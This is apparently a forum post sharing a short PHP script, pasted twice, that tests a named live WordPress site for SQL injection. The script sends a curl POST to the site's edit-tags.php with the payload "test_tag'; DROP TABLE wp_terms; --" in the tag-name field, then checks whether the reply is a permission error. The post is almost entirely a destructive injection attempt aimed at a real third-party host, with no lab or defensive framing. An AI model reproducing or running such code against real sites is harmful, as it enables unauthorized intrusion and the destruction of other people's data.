sql i test edit-tags.php wordpress
<?php
function test_sql_injection() {
$url = 'http://adroom.ir/wp-admin/edit-tags.php';
$post_data = array(
'tag-name' => "test_tag'; DROP TABLE wp_terms; --",
'taxonomy' => 'post_tag',
'submit' => 'Add Tag',
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (strpos($response, 'Sorry, you are not allowed to create terms in this taxonomy.') !== false) {
return 'ops NO OK';
} else {
return 'opsNOTOKKK';
}
}
echo test_sql_injection();
?>
<?php
function test_sql_injection() {
$url = 'http://adroom.ir/wp-admin/edit-tags.php';
$post_data = array(
'tag-name' => "test_tag'; DROP TABLE wp_terms; --",
'taxonomy' => 'post_tag',
'submit' => 'Add Tag',
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (strpos($response, 'Sorry, you are not allowed to create terms in this taxonomy.') !== false) {
return 'ops NO OK';
} else {
return 'opsNOTOKKK';
}
}
echo test_sql_injection();
?>
![[DK]](/data/avatars/s/57/57999.jpg?1720990206){kind=avatar}
